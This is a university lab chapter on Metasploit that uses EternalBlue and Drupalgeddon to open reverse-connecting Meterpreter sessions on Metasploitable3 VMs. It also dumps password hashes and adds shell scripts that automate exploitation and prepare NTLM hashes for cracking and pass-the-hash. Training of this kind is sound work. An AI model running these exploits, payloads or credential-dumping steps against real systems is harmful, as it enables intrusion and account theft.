
36 Metasploit Console and Meterpreter

Michael Lindemann and Kyle Wheaton

Frameworks can assist penetration testers in many ways. The Metasploit Framework bundles scanners, exploits, payloads and post-exploitation tooling behind one console, so finding, configuring and running an exploit follows the same steps every time.

This lab walks through scanning a target, checking whether it is vulnerable, exploiting it, and working inside the resulting Meterpreter session. Some other common features of the tool are explained along the way to give readers a starting point for exploring on their own.

Estimated time for completion: 45 minutes

Learning Objectives

  • Learn how to use and find modules in the Metasploit console
  • Learn how to configure and run Metasploit modules
  • Learn how Metasploit scanners work
  • Learn how Meterpreter sessions are managed and operate
  • Become proficient with Meterpreter features

Prerequisites

  • Chapter 42 – Building the Baseline Environment

Deliverables

  • Screenshot of 2 Meterpreter sessions open and their information
  • Screenshot of EternalBlue successful exploitation
  • Screenshot of Drupalgeddon successful exploitation
  • Explain a different Meterpreter feature not covered in the lab

Resources

Contributors and Testers

  • Kyle Wheaton, Cybersecurity Student, ERAU-Prescott

Phase 1 – The Metasploit Framework

The Metasploit Framework (msf) is organized into modules. Each module documents what it is for, what it will do to the target, and which options must be set before it can run. To make sense of a module's name, we have to understand how msf organizes its modules.

MSF arranges modules like folders and files in a file system: the first path component is the module type and the remaining components narrow it down by platform and service (for example, exploit/windows/smb/ms17_010_eternalblue). The framework ships several module types (exploit, auxiliary, post, payload, encoder, nop and evasion); this lab works mainly with three of them:

  • Exploit – Modules that deliver an exploit and a payload against a target
  • Auxiliary – Helper modules that do not deliver a payload (scanners, vulnerability checks, fuzzers, etc.)
  • Encoder – Modules that re-encode a payload to change its byte pattern (not used often)

  1. Exploring the Auxiliary Folder
    1. Open the msf console

      sudo msfconsole

    2. List the modules in the auxiliary folder. The type: keyword filters on the module type; a bare search auxiliary would also match any module whose description happens to contain that word.

      msf6 > search type:auxiliary

    3. This will show all modules contained within the “auxiliary” folder.

NOTE: What do you notice about these modules? How may these modules potentially help you during a penetration test engagement? Do the same for Exploit and Encoder. What do you notice?

Phase 2 – EternalBlue Exploit Scanning with MSF

We will be using the EternalBlue exploit for our demonstration of how to work with the Metasploit Console. Before we execute an exploit, we want evidence that the target is actually vulnerable. A failed attempt is not always harmless: EternalBlue corrupts kernel memory in the target's SMB driver, so an attempt against a patched or mismatched host can crash it rather than simply fail. Firing random modules at a host also generates noise that gets you detected and blocked from the network, ending your engagement.

Let’s use the EternalBlue exploit scanner to check if the metasploitable3 Windows VM is vulnerable!

  1. Open the Metasploit Console

    sudo msfconsole

  2. Search for `eternalblue`

    msf6 > search eternalblue

    Screenshot of the search for EternalBlue
    Figure 1 – Search for EternalBlue
  3. In Figure 1, entry 3 is auxiliary/scanner/smb/smb_ms17_010, a scanner that checks whether the target's SMB service is vulnerable to MS17-010, the flaw EternalBlue exploits. The index numbers are only positions in this particular search result and shift as modules are added, so if your listing does not match the screenshot, select the module by its full name (use auxiliary/scanner/smb/smb_ms17_010) instead of by number.

    msf6 > use 3
    msf6 > show options

    1. Showing our options, we see that most of them are already filled in.
      Screenshot of the "show options" command
      Figure 2 – Options for EternalBlue Scanner

      NOTE: Each option carries a description of what it does and how it changes the scanner's behaviour. SMBDomain, SMBUser and SMBPass let the scanner authenticate if the Metasploitable3 Windows machine were domain-joined or we knew a valid user; the check runs unauthenticated by default, so these are not required and we leave them blank. RHOSTS is the only required option without a default; it accepts a single address, a range or a CIDR block, and THREADS controls how many hosts are probed at once.

  4. Set the RHOSTS to the IP of the Metasploitable3 Windows machine.

    msf6 > set RHOSTS 200.200.200.5

    1. This tells the scanner to target the SMB service at 200.200.200.5 (port 445, the RPORT default). Run the scanner.

      msf6 > run

      Screenshot of a successful scan for EternalBlue
      Figure 3 – Successful scan for EternalBlue

      NOTE: The scanner reports that the host is likely VULNERABLE to MS17-010, so we are good to attempt exploitation. "Likely" is deliberate: the check confirms the unpatched SMB code path is present, not that the exploit will succeed on this particular build.

Phase 3 – EternalBlue Exploitation

Our scan has confirmed that the exploit is likely to work, so we are ready to attempt exploitation. That check reduced our risk of getting caught, or of crashing the host, with attempts that could never have succeeded. Go ahead and exploit!

  1. Search for EternalBlue again and load the exploit module. In Figure 4 this is entry 0, exploit/windows/smb/ms17_010_eternalblue; as before, select it by full name if your listing differs.

    msf6 > search eternalblue
    msf6 > use 0

    Screenshot of searching for EternalBlue
    Figure 4 – Searching for EternalBlue after initial scan
  2. Show the options. You will notice the exploit module has many more options than the scanner did.
    Screenshot of showing the options for the EternalBlue Exploit Module
    Figure 5 – Options for EternalBlue Exploit Module

    NOTE: At the top we can see the usual module options, similar to our scanner's. Below them is the payload section. The payload defines what runs on the target once the module has achieved code execution; its own options, LHOST and LPORT, tell it where to connect back, and LHOST must be the Kali address the target can reach. By default the module selects windows/x64/meterpreter/reverse_tcp, a staged Meterpreter that connects back to us over TCP. When it lands we get a Meterpreter session: not an ordinary command shell, but a post-exploitation agent running in the target's memory with its own command set supplied by the Metasploit framework.

  3. We can find different payloads with show payloads, which lists only the payloads compatible with the loaded module, or by looking at Rapid7's website listing the payloads in Metasploit (Resource #2)
    Screenshot of Rapid 7's list of exploits
    Figure 6 – Screenshot of Available Payloads in Metasploit Console from Rapid7
  4. Test out different payloads with EternalBlue by setting the payload:

    msf6 > set payload [payload path]

    NOTE: In the following example, we will use the default meterpreter payload.

  5. Use the default payload
    1. Ensure you have set RHOSTS (the Windows target) and LHOST (the Kali address the target can reach) before executing the EternalBlue exploit module. Exploit modules that implement a check method can also be tested with the check command, which probes the target without sending a payload: the same idea as the scanner we ran, applied from inside the exploit module.
    2. Execute the module with the run (or exploit) command
      Screenshot of a successful execution of the EternalBlue module
      Figure 7 – Successful Execution of EternalBlue Exploit Module
    3. We have now been dropped into a Meterpreter session. The prompt takes Meterpreter commands (sysinfo, getuid, pwd and so on), not PowerShell. To run Windows commands, spawn a native shell with the shell command, or launch powershell.exe with execute as shown in Phase 6.
    4. To see the features of the Meterpreter shell and what it offers, use the command below

      meterpreter > help

    5. This lists all the built-in commands of the Meterpreter shell, grouped by the extension that provides them.
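The scan-then-exploit discipline of Phases 2 and 3 can be scripted so that the exploit never fires unless the scanner flagged the host. The script below is an added example, not part of the lab or of Metasploit: it runs the smb_ms17_010 scanner non-interactively with msfconsole -q -x, parses the scanner's verdict, and only then loads ms17_010_eternalblue. The module names and console flags are the framework's own; the sample scanner output embedded for the offline self-check is constructed to match the scanner's message format, and the function names (ms17_010_vulnerable_hosts, scan_ms17_010, exploit_eternalblue) are the example's.

```shell
#!/bin/sh
# Added example (not from the lab or from Metasploit): run the MS17-010
# scanner, parse its verdict, and launch EternalBlue only against a host the
# scanner flagged. Module names and console flags are the framework's own.
set -u

# Constructed sample modelled on the scanner's message format (not captured
# from Metasploitable3); used to self-check the parser offline.
SAMPLE_SCAN_OUTPUT='[*] 200.200.200.5:445 - Using auxiliary/scanner/smb/smb_ms17_010
[+] 200.200.200.5:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 200.200.200.5:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed'

# Read scanner output on stdin and print the address of every host it flagged
# as likely vulnerable. Returns 0 if at least one host was flagged, else 1.
ms17_010_vulnerable_hosts() {
    found=1
    while IFS= read -r line; do
        case "$line" in
            *"Host is likely VULNERABLE to MS17-010"*)
                host=${line#*"] "}   # drop the "[+] " marker
                host=${host%%:*}     # keep the address, drop ":445 - ..."
                printf '%s\n' "$host"
                found=0
                ;;
        esac
    done
    return "$found"
}

# Run the scanner without an interactive console: -q drops the banner, -x
# runs the semicolon-separated console commands, and exit hands control back.
scan_ms17_010() {
    sudo msfconsole -q -x "color false; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $1; run; exit"
}

# Load and fire the exploit. exploit -z leaves the new session backgrounded
# (Phase 4 picks it up with sessions) and keeps the console open.
exploit_eternalblue() {
    sudo msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS $1; set LHOST $2; exploit -z"
}

# Usage: sh eternalblue_gate.sh --run <target> <kali-ip>
if [ "${1:-}" = "--run" ]; then
    target=$2
    lhost=$3
    if flagged=$(scan_ms17_010 "$target" | ms17_010_vulnerable_hosts); then
        printf 'scanner flagged %s; launching EternalBlue\n' "$flagged"
        exploit_eternalblue "$target" "$lhost"
    else
        printf 'scanner did not flag %s; refusing to exploit\n' "$target" >&2
        exit 1
    fi
fi
```

Run it as sh eternalblue_gate.sh --run 200.200.200.5 <kali-ip>. Matching on the console's text is the simplest gate; with the database connected (msfdb init), the scanner also records its finding, and querying that with the vulns command is the more robust check for larger scopes.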

Phase 4 – EternalBlue Post Exploitation

Looking at a few Meterpreter features, let's highlight some important post-exploitation steps. First check which account the session runs as with getuid: EternalBlue gives NT AUTHORITY\SYSTEM, which is what the commands below require.

  1. Use Meterpreter features
    1. hashdump reads the SAM database and writes each local account's password hashes to the shell's standard output, one line per account in the form user:RID:LM hash:NT hash:::. It needs SYSTEM privileges, which this session already has. Use it in the Meterpreter shell

      meterpreter > hashdump

      Screenshot of the hashdump command's output
      Figure 8 – Screenshot of Dumped Hashes from Metasploitable3 Windows
    2. Using the screenshot command of Meterpreter, we can view what is currently on the Metasploitable3 server's desktop

      meterpreter > screenshot

      NOTE: The image is saved on Kali, not on the target, as a JPEG in the directory msfconsole was started from (your home directory if you launched it from there); pass -p <path> to choose another location.

      Screenshot of the steps using the "screenshot" command that is being put onto the Kali Machine's desktop
      Figure 9 – Screenshot of Metasploitable3 Machine’s Desktop
    3. Look through the features of meterpreter and play around with them. Play the victim and see what the attacker is able to see.
    4. Background the Meterpreter session by typing background at the Meterpreter prompt. This keeps the session alive and returns you to the msf console while we exploit the Linux machine. Remember that the Windows session is session 1!

      meterpreter > background
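The hashdump lines from step 1 deserve a closer look than a screenshot. Below is an added example (not from the lab) that triages a hashdump in its user:RID:LM:NT::: format: it flags accounts whose NT hash is the well-known hash of the empty password, flags accounts that still store an LM hash, groups accounts that share an NT hash (and therefore a password), and emits user:NT pairs ready for hashcat -m 1000 --username. The sample hashdump is constructed for the example; only the two empty-password hash constants are real values.

```shell
#!/bin/sh
# Added example (not from the lab): triage Meterpreter hashdump output.
# Each input line is user:RID:LM hash:NT hash::: (the real format). The
# hash values in SAMPLE_HASHDUMP are constructed, not dumped from
# Metasploitable3; the two EMPTY_* constants are real.
set -u

# LM and NT hashes of the empty password. These are fixed by the hash
# algorithms and identical on every Windows system.
EMPTY_LM=aad3b435b51404eeaad3b435b51404ee
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0

SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:0c3b4d9e8f7a6b5c4d3e2f1a0b9c8d7e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:0c3b4d9e8f7a6b5c4d3e2f1a0b9c8d7e:::
legacy_svc:1001:9f1c2b3a4d5e6f708192a3b4c5d6e7f8:5a6b7c8d9e0f11223344556677889900:::'

# Annotate each account. A blank password needs no cracking at all, and a
# stored LM hash (case-insensitive, 7-character halves) cracks in minutes.
triage_hashdump() {
    while IFS=: read -r user rid lm nt _rest; do
        [ -n "$user" ] || continue
        flags=""
        [ "$nt" = "$EMPTY_NT" ] && flags="$flags blank-password"
        [ "$lm" != "$EMPTY_LM" ] && flags="$flags lm-hash-stored"
        suffix=""
        [ -n "$flags" ] && suffix=" [${flags# }]"
        printf '%s:%s:%s%s\n' "$user" "$rid" "$nt" "$suffix"
    done
}

# Accounts that share an NT hash share a password: one cracked or passed
# hash opens all of them. Prints hash:user1,user2 for each such group.
reused_nt_hashes() {
    awk -F: 'NF >= 4 { users[$4] = users[$4] "," $1; n[$4]++ }
             END { for (h in n) if (n[h] > 1) print h ":" substr(users[h], 2) }'
}

# user:NT lines for hashcat -m 1000 --username; blank passwords are skipped.
nt_hashes_for_cracking() {
    awk -F: -v empty="$EMPTY_NT" 'NF >= 4 && $4 != empty { print $1 ":" $4 }'
}

# Usage: meterpreter> hashdump output pasted into hashes.txt, then
#   sh hashdump_triage.sh --run hashes.txt
if [ "${1:-}" = "--run" ]; then
    triage_hashdump < "$2"
    printf -- '--- reused NT hashes ---\n'
    reused_nt_hashes < "$2"
    nt_hashes_for_cracking < "$2" > ntlm.txt
    printf 'wrote ntlm.txt for: hashcat -m 1000 --username ntlm.txt <wordlist>\n'
fi
```

The NT hash alone is enough for pass-the-hash against SMB, so the reuse report matters even when nothing cracks: every account in a group is reachable with whichever hash you already hold.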


Phase 5 – Drupal Exploitation

This next exercise takes advantage of another remote code execution path, this time in Drupal, a PHP content management system. CVE-2014-3704 (Drupalgeddon) is a pre-authentication SQL injection in the database abstraction layer of Drupal 7 core; the Metasploit module turns that injection into code execution on the web server.

  1. Load the Drupalgeddon exploit module using the steps from the previous phases. In Figure 10 it is entry 2, exploit/multi/http/drupal_drupageddon (note Metasploit's spelling); select it by full name if your search order differs. options is shorthand for show options.

    msf6 > search drupal
    msf6 > use 2
    msf6 > options

    Screenshot of the Drupalgeddon Exploit Module Options
    Figure 10 – Drupalgeddon Exploit Module Options
  2. Use the info command in the Metasploit Console to review how the exploit works and the details of the CVE

    msf6 > info

    Screenshot of Drupalgeddon Exploit Module Information
    Figure 11 – Drupalgeddon Exploit Module Information

    NOTE: This information is extremely useful. Not only does it describe what the module does and the references behind the CVE, but also which targets (Drupal versions and injection methods) the module supports. You can change the target with set TARGET <index>, just as we set RHOSTS before.

  3. The following options must be set to point the module at the Metasploitable3 Linux machine from the network map. TARGETURI is the path under which Drupal is served, and LHOST must again be the Kali address the target can reach.
    1. Leave the recommended target 0 in place

      msf6 > set RHOSTS 200.200.200.6
      msf6 > set TARGETURI /drupal/

  4. Execute the exploit module

    msf6 > exploit

    1. A new meterpreter session has been opened. This meterpreter session should appear as session 2 since session 1 is still open with the Metasploitable3 Windows machine.
      Screenshot of the second Meterpreter Session opened with Drupalgeddon Exploit Module
      Figure 12 – Second Meterpreter Session Opened with Drupalgeddon Exploit Module
  5. Background the session

    meterpreter > background

    Screenshot of the user putting session 2 in the background using the "background" command
    Figure 13 – Meterpreter Session 2 Backgrounded

Phase 6 – Meterpreter Session Management

Within Metasploit, the console can hold many Meterpreter sessions at once, each numbered in the order it was opened. Switching between the machines you have gained access to matters when comparing information, staging further exploits, and deploying tooling. This phase explains how to handle multiple Meterpreter sessions.

  1. View all active sessions by using the sessions command

    msf6 > sessions

    Screenshot of the "sessions" command output
    Figure 14 – Output of Sessions Command
  2. Switch back to the Metasploitable3 Windows session
    1. To interact with a session, use the same sessions command with the session number (sessions -i 1 is the long form)

      msf6 > sessions 1


      Screenshot of switching back to Session 1
      Figure 15 – Switch Back to Session 1
    2. To get back to the Metasploit console, background the session as before.
    3. Now that we can switch between the sessions, compare the help output on each: Meterpreter loads different extensions depending on the operating system it is running on, so the Windows session offers commands (hashdump, screenshot) that the Linux session does not.
    4. There are many reasons you may not want to work through Meterpreter commands directly. Luckily, you can easily switch to a normal shell.
  3. Using the execute command with -i (interact), you can run a program on the target and attach to its input and output as if you were sitting at a shell.

    msf6 > sessions 2
    meterpreter > execute -f /bin/bash -i

    Screenshot of the Meterpreter session converted to a bin-bash shell.
    Figure 16 – Meterpreter session converted to a bin-bash shell.

    NOTE: The same thing works on the Windows session with -f cmd.exe or -f powershell.exe. The Meterpreter shell command is a shortcut that spawns the platform's default shell for you; type exit in that shell to return to the Meterpreter prompt without closing the session.

    1. To close a Meterpreter session, interact with it and use exit to drop the connection; sessions -k <id> does the same from the console without interacting.
      Screenshot of closing Meterpreter Session 1
      Figure 17 – Closing Meterpreter Session 1.

      NOTE: There are a lot more meterpreter features. Use help or ? to find out more. Metasploit can be a very powerful tool once you learn its core features.
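All of Phases 3 to 6 can be driven from a Metasploit resource script, which is the usual way to make a sequence of console commands repeatable. The script below is an added example, not part of the lab: it writes an .rc file that loads both exploit modules, launches each with exploit -j -z so the session is backgrounded as soon as it lands, and then lists the sessions and runs getuid and sysinfo on all of them with sessions -C. The module names, console commands and flags are Metasploit's own; the file name lab_sessions.rc and the function names are the example's, and LHOST is assumed to be the Kali address both targets can reach.

```shell
#!/bin/sh
# Added example (not from the lab): drive the Windows and Linux exploits from
# a Metasploit resource script so both sessions come up backgrounded and can
# be queried together. Module names and flags are the framework's own; the
# addresses are the lab's; LHOST is the Kali interface the targets can reach.
set -u

# Write the resource script. exploit -j -z runs each exploit as a background
# job and does not drop into the session, so the console keeps going. The
# console's own sleep gives the reverse connections time to land before the
# session commands run; sessions -C with no -i targets every open session.
write_lab_rc() {
    rc=$1
    lhost=$2
    win=$3
    linux=$4
    cat > "$rc" <<EOF
color false
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $win
set LHOST $lhost
exploit -j -z
use exploit/multi/http/drupal_drupageddon
set RHOSTS $linux
set TARGETURI /drupal/
set LHOST $lhost
exploit -j -z
sleep 30
sessions -l
sessions -C getuid
sessions -C sysinfo
EOF
}

# Launch msfconsole with the script. It stays interactive afterwards, so
# sessions -i 1 and sessions -i 2 work exactly as in Phase 6.
run_lab() {
    sudo msfconsole -q -r "$1"
}

# Usage: sh lab_sessions.sh --run <kali-ip>
if [ "${1:-}" = "--run" ]; then
    write_lab_rc lab_sessions.rc "$2" 200.200.200.5 200.200.200.6
    run_lab lab_sessions.rc
fi
```

Because the exploits run as jobs, the session numbers are assigned in the order the payloads connect back, not the order the modules were launched; read them from the sessions -l table rather than assuming Windows is session 1.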


License

Icon for the Creative Commons Attribution-NonCommercial 4.0 International License

Mastering Enterprise Networks 2e Copyright © 2024 by Mathew J. Heath Van Horn is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License, except where otherwise noted.